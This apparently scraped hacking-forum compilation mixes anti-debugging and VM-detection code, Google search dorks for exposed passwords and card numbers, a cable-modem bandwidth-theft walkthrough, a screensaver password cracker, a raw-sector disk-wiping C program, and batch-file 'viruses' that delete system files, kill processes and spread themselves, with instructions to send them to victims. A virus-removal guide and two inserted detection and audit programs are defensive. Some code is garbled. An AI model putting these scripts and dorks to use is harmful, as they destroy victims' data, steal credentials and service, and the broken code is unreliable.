leave
ret
}
}


Detecting Breakpoints
/*
Functions are declared as __inline; this causes the code to be expanded each time a function
is invoked, which makes the cracker's work more difficult when the function is used more than once.

Function: IsBPX
Description: Checks if the given memory address is a breakpoint
Returns: true if it is a breakpoint
*/

__inline bool IsBPX(void *address) {
_asm {
mov esi, address // load function address
mov al, [esi] // load the opcode
cmp al, 0xCC // check if the opcode is CCh
je BPXed // yes, there is a breakpoint

// jump to return true
xor eax, eax // false,
jmp NOBPX // no breakpoint
BPXed:
mov eax, 1 // breakpoint found
NOBPX:
}
}

Detecting VMWare
/*
executes VMware backdoor I/O function call
*/

#define VMWARE_MAGIC 0x564D5868 // Backdoor magic number
#define VMWARE_PORT 0x5658 // Backdoor port number
#define VMCMD_GET_VERSION 0x0a // Get version number

int VMBackDoor(unsigned long *reg_a, unsigned long *reg_b, unsigned long *reg_c, unsigned long *reg_d) {
unsigned long a, b, c, d;
b=reg_b?*reg_b:0;
c=reg_c?*reg_c:0;

xtry {
__asm {
push eax
push ebx
push ecx
push edx

mov eax, VMWARE_MAGIC
mov ebx, b
mov ecx, c
mov edx, VMWARE_PORT

in eax, dx

mov a, eax
mov b, ebx
mov c, ecx
mov d, edx

pop edx
pop ecx
pop ebx
pop eax
}
} xcatch(...) {}

if(reg_a) *reg_a=a; if(reg_b) *reg_b=b; if(reg_c) *reg_c=c; if(reg_d) *reg_d=d;
return a;
}

/*
Check VMware version only
*/

int VMGetVersion() {
unsigned long version, magic, command;
command=VMCMD_GET_VERSION;
VMBackDoor(&version, &magic, &command, NULL);
if(magic==VMWARE_MAGIC) return version;
else return 0; }

/*
Check if running inside VMWare
*/

int IsVMWare() {
int version=VMGetVersion();
if(version) return true; else return false;
}



Fooling ProcDump
/*
Fool ProcDump with increasing size
*/

void FoolProcDump() {
__asm {
mov eax, fs:[0x30]
mov eax, [eax+0xC]
mov eax, [eax+0xC]
add dword ptr [eax+0x20], 0x2000 // increase size variable
}
}



Combining everything
bool CDebugDetect::IsDebug() {
#ifdef _DEBUG

return false;

#else

if(m_bIsDebug) return true;

#ifndef _WIN32
// Anti-PTrace
// if(ptrace(PTRACE_TRACEME, 0, 1, 0)<0) {
// m_bIsDebug=true; return true;
// }
#else
pfnIsDebuggerPresent IsDbgPresent=NULL;
HMODULE hK32=GetModuleHandle("KERNEL32.DLL");
if(!hK32) hK32=LoadLibrary("KERNEL32.DLL");
if(hK32) {
IsDbgPresent=(pfnIsDebuggerPresent)GetProcAddress(hK32, "IsDebuggerPresent");
}

FoolProcDump();
ScrewWithVirtualPC();

unsigned long lStartTime=GetTickCount();

if(IsBPX(&IsBPX)) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "Breakpoint set on IsBPX, debugger active...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}

if(IsBPX(&IsSICELoaded)) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "Breakpoint set on IsSICELoaded, debugger active...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}

if(IsBPX(&IsSoftIceNTLoaded)) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "Breakpoint set on IsSoftIceNTLoaded, debugger active...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}

if(IsBPX(&IsVMWare)) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "Breakpoint set on IsVMWare, debugger active...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}

if(IsSoftIceNTLoaded()) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "SoftIce named pipe exists, maybe debugger is active...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}

if(IsSICELoaded()) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "SoftIce is loaded, debugger active...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}

// if(IsVMWare()) {
//#ifdef DBGCONSOLE
// g_cConsDbg.Log(5, "Running inside VMWare, probably honeypot...\n");
//#endif // DBGCONSOLE
// m_bIsDebug=true; return true;
// }

if(IsDbgPresent) {
if(IsBPX(&IsDbgPresent)) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "Breakpoint set on IsDebuggerPresent, debugger active...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}
}

if((GetTickCount()-lStartTime) > 5000) {
#ifdef DBGCONSOLE
g_cConsDbg.Log(5, "Routine took too long to execute, probably single-step...\n");
#endif // DBGCONSOLE
m_bIsDebug=true; return true;
}
#endif // WIN32

return false;

#endif // _DEBUG
}
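For an analyst triaging a sample, the checks above leave static artifacts that can be searched for without running anything: the `\\.\NTICE` device name passed to CreateFile, and the VMware backdoor constants (magic 0x564D5868, port 0x5658) loaded shortly before an `in eax, dx`. The scanner below is an added example, not code from the original page; the function and flag names, the 32-byte window and the sample buffers are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Result flags (names are this example's own, not from the page). */
#define HIT_NTICE_DEVICE 0x1u /* ASCII device path \\.\NTICE              */
#define HIT_VMWARE_MAGIC 0x2u /* 0x564D5868 stored little-endian          */
#define HIT_VMWARE_PROBE 0x4u /* magic, then port 0x5658, then IN EAX,DX  */
#define PROBE_WINDOW 32       /* assumed: bytes after the magic to inspect */

/* Offset of needle in hay[from..hlen), or -1 if absent. */
static long find_bytes(const unsigned char *hay, size_t hlen,
                       const unsigned char *needle, size_t nlen, size_t from)
{
    size_t i;
    if (nlen == 0 || hlen < nlen) return -1;
    for (i = from; i + nlen <= hlen; i++)
        if (memcmp(hay + i, needle, nlen) == 0) return (long)i;
    return -1;
}

/* Scan a code or file buffer and return a bitmask of HIT_* flags. */
unsigned scan_antianalysis(const unsigned char *buf, size_t len)
{
    static const unsigned char ntice[] = "\\\\.\\NTICE";            /* as on the page */
    static const unsigned char magic[] = { 0x68, 0x58, 0x4D, 0x56 }; /* VMWARE_MAGIC   */
    static const unsigned char port[]  = { 0xBA, 0x58, 0x56 };       /* mov (e)dx,5658h */
    unsigned hits = 0;
    size_t from = 0;
    long m;

    if (find_bytes(buf, len, ntice, sizeof ntice - 1, 0) >= 0)
        hits |= HIT_NTICE_DEVICE;

    /* Every occurrence of the magic is checked: the constant alone is weak
       evidence, the full load/IN sequence close behind it is much stronger. */
    while ((m = find_bytes(buf, len, magic, sizeof magic, from)) >= 0) {
        size_t start = (size_t)m + sizeof magic;
        size_t end = start + PROBE_WINDOW < len ? start + PROBE_WINDOW : len;
        long p = find_bytes(buf, end, port, sizeof port, start);

        hits |= HIT_VMWARE_MAGIC;
        if (p >= 0 && memchr(buf + p + sizeof port, 0xED,
                             end - ((size_t)p + sizeof port)))
            hits |= HIT_VMWARE_PROBE;   /* 0xED is the opcode of IN EAX,DX */
        from = (size_t)m + 1;
    }
    return hits;
}

/* Constructed sample: bytes equivalent to the VMBackDoor sequence on the page. */
static const unsigned char sample_probe[] = {
    0x50, 0x53, 0x51, 0x52,        /* push eax / ebx / ecx / edx */
    0xB8, 0x68, 0x58, 0x4D, 0x56,  /* mov eax, 0x564D5868        */
    0x8B, 0x5D, 0xF8,              /* mov ebx, [ebp-8]           */
    0x8B, 0x4D, 0xF4,              /* mov ecx, [ebp-12]          */
    0xBA, 0x58, 0x56, 0x00, 0x00,  /* mov edx, 0x5658            */
    0xED                           /* in eax, dx                 */
};
/* Constructed sample: the magic present only as data, with no port I/O. */
static const unsigned char sample_data_only[] = {
    0x00, 0x68, 0x58, 0x4D, 0x56, 0x00, 0x00, 0x00
};
/* Constructed samples: a string table entry and an unrelated buffer. */
static const unsigned char sample_ntice[] = "open \\\\.\\NTICE";
static const unsigned char sample_clean[] = "hello world";

int main(void)
{
    printf("probe     -> 0x%x\n", scan_antianalysis(sample_probe, sizeof sample_probe));
    printf("data only -> 0x%x\n", scan_antianalysis(sample_data_only, sizeof sample_data_only));
    printf("ntice     -> 0x%x\n", scan_antianalysis(sample_ntice, sizeof sample_ntice));
    printf("clean     -> 0x%x\n", scan_antianalysis(sample_clean, sizeof sample_clean));
    return 0;
}
```

The VMware constants also appear in legitimate guest-aware software such as VMware Tools, so a hit is a triage signal to follow up with disassembly, not a verdict.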
Calculating TCP/IP checksum in assembler to gain s
/*
This calculates a TCP/IP checksum
*/

#ifdef WIN32
#define USE_ASM
#endif // WIN32

unsigned short checksum(unsigned short *buffer, int size) {
unsigned long cksum=0;

#ifdef USE_ASM

unsigned long lsize=size;
char szMMBuf[8], *pMMBuf=szMMBuf;

__asm {
FEMMS

MOV ECX, lsize // ecx=lsize;
MOV EDX, buffer // edx=buffer;
MOV EBX, cksum // ebx=cksum;

CMP ECX, 2 // size<2;
JS CKSUM_LOOP2 // goto loop 2

CKSUM_LOOP:

XOR EAX, EAX // eax=0;
MOV AX, WORD PTR [EDX] // ax=(unsigned short*)*buffer;
ADD EBX, EAX // cksum+=(unsigned short*)*buffer;

SUB ECX, 2 // size-=2;
ADD EDX, 2 // buffer+=2;
CMP ECX, 1 // size>1
JG CKSUM_LOOP // while();

CMP ECX, 0 // if(!size);
JE CKSUM_FITS // fits if equal

CKSUM_LOOP2:

XOR EAX, EAX // eax=0;
MOV AL, BYTE PTR [EDX] // al=(unsigned char*)*buffer;
ADD EBX, EAX // cksum+=(unsigned char*)*buffer;

SUB ECX, 1 // size-=1;
ADD EDX, 1 // buffer+=1;
CMP ECX, 0 // size>0;
JG CKSUM_LOOP2 // while();

CKSUM_FITS:

MOV cksum, EBX // cksum=ebx;

MOV EAX, cksum // eax=cksum;
SHR EAX, 16 // eax=cksum>>16;
MOV EBX, cksum // ebx=cksum;
AND EBX, 0xffff // ebx=cksum&0xffff;

ADD EAX, EBX // eax=(cksum>>16)+(cksum&0xffff);

MOV EBX, EAX // ebx=cksum;
SHR EBX, 16 // ebx=cksum>>16;
ADD EAX, EBX // cksum+=(cksum>>16);

MOV cksum, EAX // cksum=EAX;

FEMMS
}

#else // USE_ASM

while(size>1) { cksum+=*buffer++; size-=2; }
if(size) cksum+=*(unsigned char*)buffer;

cksum=(cksum>>16)+(cksum&0xffff);
cksum+=(cksum>>16);

#endif // USE_ASM

return (unsigned short)(~cksum); }
*/

Google Hacking

Well, first of all, there is no such thing as Google hacking, but we can use Google to hack other websites.

Using Google, and some finely crafted searches we can find a lot of interesting information.

For Example we can find:
Credit Card Numbers
Passwords
Software / MP3's
...... (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.

Try a few of these searches:
intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurl:passlist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"

Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999

"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
METHOD 2
put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson
METHOD 3
put this string in google search:
inurl:Mcft filetype:iso
You can change the string to whatever you want, e.g. Mcft to adobe, iso to zip, etc.
"# -FrontPage-" inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!


"AutoCreate=TRUE password=*"
This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: coara.or.jp/~passy/ [coara.or.jp/~passy/]

"http://*:*@www" domainname
This is a query to get inline passwords from search engines (not just Google). You must type in the query followed by the domain name without the .com or .net

"http://*:*@www" bangbus or "http://*:*@www"bangbus

Another way is by just typing
"http://bob:bob@www"

"sets mode: +k"
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.

allinurl: admin mdb
Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!

allinurl:auth_user_file.txt
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)


intitle:"Index of" config.php
This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.

eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown discussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.

Hacking Your Modem For Gaining More Speed

Hack Your Modem and Increase Your Download Speed from 64Kbps to any Speed You Wish

Most of us will be feeling that the surfing speed which is allocated by our ISP is not enough. People with 64Kbps will think 128Kbps will be cool speed. People with 128Kbps will think 256Kbps will be cool and so on


This tutorial will teach you how to increase your 64Kbps link to 512Kbps or what ever speed you like.



It is very much possible to do this, with a bit of luck, if your cable Internet service provider is poorly informed about how this very new technology works and leaves some key loopholes open for you to grab the vital information needed to accomplish this task. But this tutorial does not guarantee you 100% success.
Okay, here we go. I'm going to try to explain as best I can how to re-configure your SB5100, SB4100 or SB3100 cable modem.



Theory of cable modem working



When a cable modem boots up, it searches for an "Image file" in which all configuration, such as your upload speed limit and download speed limit, is defined. This "Image file" is stored on the ISP's TFTP server. The modem is pre-configured with the ISP's TFTP server IP address and the name of the Image file to be downloaded. When the modem boots up, it queries the TFTP server and downloads the Image file from it, and our speed limits are set according to this file.
Our Mission



Get this Image file from ISP`s TFTP server, reconfigure it according to our need and force our modem to download this file from our Computer rather than downloading it from our ISP`s TFTP server.



1). Get the cable modem's MAC address

You can either look at the back of the modem to get the MAC address, or you can log on to your cable modem with your Web browser at hxxp://192.168.100.1/ . These are internal HTML pages stored within your DOCSIS cable modem (SB5100, SB4100 and SB3100) that give you even more vital information on configuration, unless the feature is turned off by your ISP. This feature might be totally turned off by your ISP.
2). Get your ISP's TFTP server IP address





a) There's a program called QUERY.EXE from Weird Solutions which is a BOOTP packet request program that will tell you everything you need to know, without all these extra steps. It will display the Image Filename, TFTP server address, which is really all you need to get started. To use this BOOTP QUERY tool, you need the MAC address of your cable modem or Beginners can use DOCSIS Diagnosis utility



http://sourceforge.net/projects/docsis



Using the above tools you will get the information of your ISP`s TFTP server IP and the name of your "Image file" stored in that TFTP server

All your vital information is stored in this file, One of which is the MaxRateDown 2621440; MaxRateUp 393216;. (This was my ISP settings. Which you can see is similar to what speed I was getting. 40KB/s up and 250 KB/s down)



Among these, the one we need are:

Configuration TFTP Server = 194.*.*..90 (replace this with yours throughout in the doc)

Configuration filename = isrr.bin (replace this with yours throughout in the doc)

And

IP fragments created = 0

IP address.10.xxx.xxx.xxx = 10.xxx.xxx.xxx

IP address.192.168.100.1 = 192.168.100.1 (the IP address of the cable modem, (replace this with yours throughout in the doc)

IP-to-If-index.10.xxx.xxx.xxx = 2



Suggestion: You can do this step by sniffing the modem i.e. "192.168.100.1" when modem boots up. I never tried this method. Try your luck.

3) Download Image file from ISP`s TFTP server.



To do this, go to your command prompt and use the command below, without the quotes and brackets.

"C:\tftp -i GET "


Okay now you got Image file from your ISP`s TFTP server.


4). Decrypt the Image file which you downloaded from ISP`s TFTP server
For all you can use the DOCsis tool http://sourceforge.net/projects/docsis to decode
5). Modify the Image file

Change your computer's TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server)



Go to my network place and right click ->properties

Select your LAN Card right click ->property->Internet Protocol (TCP-IP) double click on it and change it to as following values

Configure your PC's TCP settings as below

IP: 194.*.*.90 (replace with the ISP's TFTP server)

Netmask: 255.255.255.0

Gateway: 192.168.100.1 (replace with your cable modem's IP address)



Note: Gateway should be 192.168.100.1 then only your modem can communicate with computer.



6). Encrypt the modified Image file (Save it using Docsis)



7). Host TFTP server in your computer

Download TFTP Server software and host TFTP server in your computer

You can download TFTP server from: [content suppressed]



8). Put Image file in the base directory of your TFTP

Start TFTPD32 server. Go to Settings and set the Security to None. Increase the timeout to 20secs and the Max Retransmit to 6. Choose to translate UNIX filenames. Make sure it's base directory point to where the isrr.bin is (i.e. the image file which you modified). If you need to replicate a directory pathname along with the image file, then make a directory from root that corresponds to the image file pathname.

Restart your modem, and AS SOON as the SEND light goes solid, you should see a receive on your TFTP server i.e. your PC



9). Restart your modem

10). Change your PC's IP back to the one given by your ISP

11). OOPS Done. Start surfing with your new speed



Note: This speed will remain same until you restart your cable modem. So each time you reboot your modem you have to follow the steps 7 to 11


You can download TFTP server from: ftp: //ftp.ida.net/pub/wireless/tftpd32.exe

Manually Removing Viruses From PC

Have you ever been in the position where you know you have a virus but you don't have any antivirus? It's almost impossible to remove it manually without knowing a few tips and tricks.
After reading this tutorial, I'm sure you will know how to manually remove most of the viruses lurking around. But that doesn't mean you shouldn't have any antivirus on your computer!
Anyway, let's get started with the tutorial. I suppose you already know what safe mode is. If you don't, try pressing the F8 key a few times when you start your computer. You have to do this when your computer is about to start the first Windows components. In Win2k or XP I think you can press space and then F8 when it asks you if you want to go back to the previous working settings.
Enough talk about how to start your computer in safe mode, but if you want to manually remove viruses you almost always have to do this in safe mode, because in safe mode most viruses don't start. Only a few Windows components are allowed to run in safe mode. So here is what to do.
Steps:
1: Start your computer in safe mode.
2: If you know where the virus is hiding, delete the executable file.
3: Open the registry, go to the keys below, and add a : in front of the value of the string that you think is the virus. For example, if the string is "virus" and its value is "c:\virus.exe", change its value to ":c:\virus.exe". The : is like commenting out the value. But if you are sure it's the virus, you can just delete the string.


Here are the keys you may want to look at:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
4: The virus can start itself from some other places too. win.ini is the most common file that viruses use. So you should find the files named win.ini and system.ini, look through them, and see if you find anything.
5: Look through the Startup folder, which is normally located in your profile directory under \Start Menu\Programs\Startup.
6: Try searching for the virus executable to see if it's hiding in some other place.
7: Finally, look through the list of services that Windows is running. This list is often located under Control Panel - Administrative Tools - Services.

After these 7 steps, just reboot your computer in normal mode and try to figure out whether the virus is still there. If not, SUCCESS; if yes, go back to safe mode and hunt some more. Of course, these 7 steps will not work on every virus out there, but they will on many of them.

-Be careful with the registry, don't mess it up. If u do, ur computer is ****** lol, depends on what u mess up. I suggest u make a system restore point first, so in case something happens you can go back to it. -

1. You can edit the hidden autorun.inf file in the root directory with some cmd commands like chkdsk etc. Also u can do this: open autorun.inf and see the contents in it (using Notepad). If anything comes with shell= or openshell=, see the file name. It may be .vbs / .exe / .cmd / .dll... anything. Search for that file, delete that file first and then delete the autorun.inf. In most cases u can find more than 1 file in the shell scripts (the line that has the word shell in autorun.inf).
2. Edit the system.ini file (ok, when I say edit, it means open in Notepad) and see the contents.
It may come up with some different stuff and associate any .exe, .dll etc. However, some .dlls are stored by software and some by a virus, so it may be difficult to find out which one is malicious. Show the file to some knowledgeable person, or in that case u can post this issue here and you will be guided correctly.

In most cases, Task Manager is turned off, so to check the background processes u can download HijackThis from the internet. It's about 700kB and it's FREE!! Google for the software.
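The registry part of the procedure above, as an added example that is not part of the original post: a small C parser that reads saved `reg query` output, keeps only values under the Run-family keys listed in step 3, and labels each one as active, disabled with the `:` prefix, or pointing at a script. The space-separated column layout, the function names, the script extension list and the sample text are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Categories are this example's own; they describe an entry, they do not judge it. */
enum verdict { V_ACTIVE, V_DISABLED, V_SCRIPT };

struct autorun {
    char key[160], name[64], data[200]; /* key path, value name, command line */
    enum verdict verdict;
};

static int lower(int c) { return tolower((unsigned char)c); }

/* Case-insensitive substring test. */
static int contains_ci(const char *s, const char *needle)
{
    size_t n = strlen(needle), i;
    for (; *s; s++) {
        for (i = 0; i < n && s[i] && lower(s[i]) == lower(needle[i]); i++) {}
        if (i == n) return 1;
    }
    return 0;
}

/* Case-insensitive "s ends with suffix". */
static int ends_with_ci(const char *s, const char *suffix)
{
    size_t ls = strlen(s), lx = strlen(suffix);
    return lx <= ls && contains_ci(s + ls - lx, suffix);
}

/* Copy src[0..len) into dst (capacity cap) without surrounding whitespace. */
static void copy_trimmed(char *dst, size_t cap, const char *src, size_t len)
{
    while (len && isspace((unsigned char)*src)) { src++; len--; }
    while (len && isspace((unsigned char)src[len - 1])) len--;
    if (len >= cap) len = cap - 1;
    memcpy(dst, src, len);
    dst[len] = '\0';
}

static enum verdict classify(const char *data)
{
    static const char *ext[] = { ".bat", ".cmd", ".vbs" }; /* assumed script list */
    size_t i;
    if (data[0] == ':') return V_DISABLED; /* the ':' prefix from step 3 */
    for (i = 0; i < sizeof ext / sizeof ext[0]; i++)
        if (ends_with_ci(data, ext[i])) return V_SCRIPT;
    return V_ACTIVE;
}

/* Parse `reg query`-style text; returns the number of entries written to out. */
int audit_autoruns(const char *text, struct autorun *out, int max)
{
    char key[160] = "", line[512];
    int watched = 0, n = 0;
    while (*text && n < max) {
        const char *eol = strchr(text, '\n'), *type, *data;
        size_t len = eol ? (size_t)(eol - text) : strlen(text);
        copy_trimmed(line, sizeof line, text, len);
        if (strncmp(line, "HKEY_", 5) == 0) {
            copy_trimmed(key, sizeof key, line, strlen(line));
            /* matches Run, RunOnce, RunOnceEx, RunServices, RunServicesOnce */
            watched = contains_ci(key, "\\CurrentVersion\\Run");
        } else if (watched && (type = strstr(line, " REG_")) != NULL) {
            data = type + 1;
            while (*data && !isspace((unsigned char)*data)) data++; /* skip type */
            strcpy(out[n].key, key);
            copy_trimmed(out[n].name, sizeof out[n].name, line, (size_t)(type - line));
            copy_trimmed(out[n].data, sizeof out[n].data, data, strlen(data));
            out[n].verdict = classify(out[n].data);
            n++;
        }
        text += len + (eol ? 1 : 0);
    }
    return n;
}

/* Constructed sample, laid out the way `reg query <key>` prints (space-separated). */
static const char sample[] =
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\n"
    "    Example Updater Service    REG_SZ    C:\\Tools\\updater.exe\n"
    "    virus    REG_SZ    :c:\\virus.exe\n"
    "    Greatgame    REG_SZ    C:\\WINDOWS\\Greatgame.bat\n"
    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\n"
    "    ShellState    REG_BINARY    2400\n";

int main(void)
{
    struct autorun e[16];
    int i, n = audit_autoruns(sample, e, 16);
    for (i = 0; i < n; i++)
        printf("%d  %s | %s = %s\n", (int)e[i].verdict, e[i].key, e[i].name, e[i].data);
    return 0;
}
```

Keeping the saved listing from before and after a cleanup gives a record of which values were disabled, which is useful if a legitimate entry was commented out by mistake.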

Virus Thread



Second Part To Hell's HTML.Umbriel











Slowing Down the PC
VIRUS SOURCE CODE
hello friends...
open NOTEPAD
then paste this code in notepad..code is

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

now save this in notepad..
and SCAN it or test it with any antivirus.... I'm damn sure it will be detected as a virus by the antivirus scan and it will slow the computer for 5 minutes..


Very easy but dangerous Virus
Ok, now, the trick:

The only thing you need is Notepad.

Now, to test it, create a textfile called TEST.txt(empty) in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:

Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.


Simple explanation:

Go to notepad, type erase C:\WINDOWS, save, send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...


HEY I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

AGAIN :I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

be aware of this..its a simple but a strong virus that can delete anyones window os through email ..ok???
------------------------------

Virus


Virus
@echo off
del C:/WINDOWS/system32/Restore
del C:/WINDOWS/system32/winlogon.exe
del C:/WINDOWS/system32/logonui.exe



save this as virus1.bat and send it to the victim...

Msn Killer
@echo off
cls
tskill msnmsgr


save this as bat and send it to the victim.. destroys.. msn messenger

Task Kill
@echo off
start calc
tskill msnmsgr
tskill firefox
tskill iexplore
tskill LimreWire
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
pause


save this as bat and send and destroy the vtim

Virus
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP



Use this to:
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer



ScreenSaver Password Cracker
Description This code lets you know the Screen Saver Password. You can now know how they encrypt the password, how we can decrypt it.
/*
Screen Saveer Password Cracker:
Decrypts Screen Saver Password which is stored in user.dat.
*/

#include
#include
#include
FILE *fp;
char *path="c:\windows\user.dat";

/*encrypted password stored in this file when u log on to default user..

If there r multiple users..Password stored in
\windowsprofilesuser-nameuser.dat...

*/

unsigned long int search(char *s);
char *encstr(unsigned long int loc);
int toint(char a);
void main()
{
unsigned long int l;
char s[51];
int arr[]={4,8,14,14,7,6,1,13,6,7,6,9,10,1,1,11,7,10,8,12,4,7,
15,8,5,4,9,5,9,7,5,15,7,8,13,9,13,10,6,12,5,9,13,7,6,11,3,5,12,5};

//this array is 2 b xored with encrypted-string

int s1[51],s2[51];
int i,len,k;

clrscr();
l=search("ScreenSave_Data");
strcpy(s,encstr(l));
len=strlen(s);
for(i=0;i{
s1=toint(s);
s2=(s1)^(arr);
}
printf("Current Screen Saver Password:
");
for(i=0;iprintf("%c", (s2*16)+(s2[i+1]) );


}

/* Searches where ScreenSave_Data is there in the file
and returns the location*/
unsigned long int search(char *s)
{
int k=0,len,ch;
unsigned long int i=0;
fp=fopen(path,"rb");
len=strlen(s);
while( (ch=getc(fp))!=EOF)
{
if(ch==s[k])
k++;
else k=0;

i++;
if(k==len)
return i;

}
}

/* It returns Encrypted String*/

char *encstr(unsigned long int loc)
{
char ch,s[55],ch1;
int i=0;

ch=toascii(0);
fp=fopen(path,"rb");
fseek(fp,loc,SEEK_SET);
while( (ch1=fgetc(fp))!=ch)
{ s=ch1;
i++;
}
s='

C Bomber
#include

main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("FUCK YOU ALL");
printf("The Bomber");
}


C++ Virus
Ok first off I’d like to say 2 things:

1. This guide is only intended for people who want to learn
2. I don’t condone releasing viruses in any way

Taking the above into consideration I’d like to say welcome to the world of virus programming I’m hoping upon reading this you well become as fascinated by viruses as I am and continue to study and write new unique viruses.

Most of the virus writing guides I’ve seen are lengthy, boring and out of date, this guide will try to be the opposite short, fun and to the point. Now this is what you will need to start programming:

Win32 API Reference <- Not Required but very helpful
A C++ Compiler – I Recommend DEV for people who do not wish to buy and Microsoft Visual C++ 6.0 for people with money and serious programmers, however DEV works fine.

Even if you have never programmed before you should be able to carry along with this one, but it helps if you know a little bit of C++.

Ok lets begin fire up DEV or MSVC and select new Win32 GUI for DEV users and Win32 for MSVC. Now with DEV it makes some generated code for GUI apps, delete it all leaving something like this:

QUOTE
#include

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)

{

return 0;
}
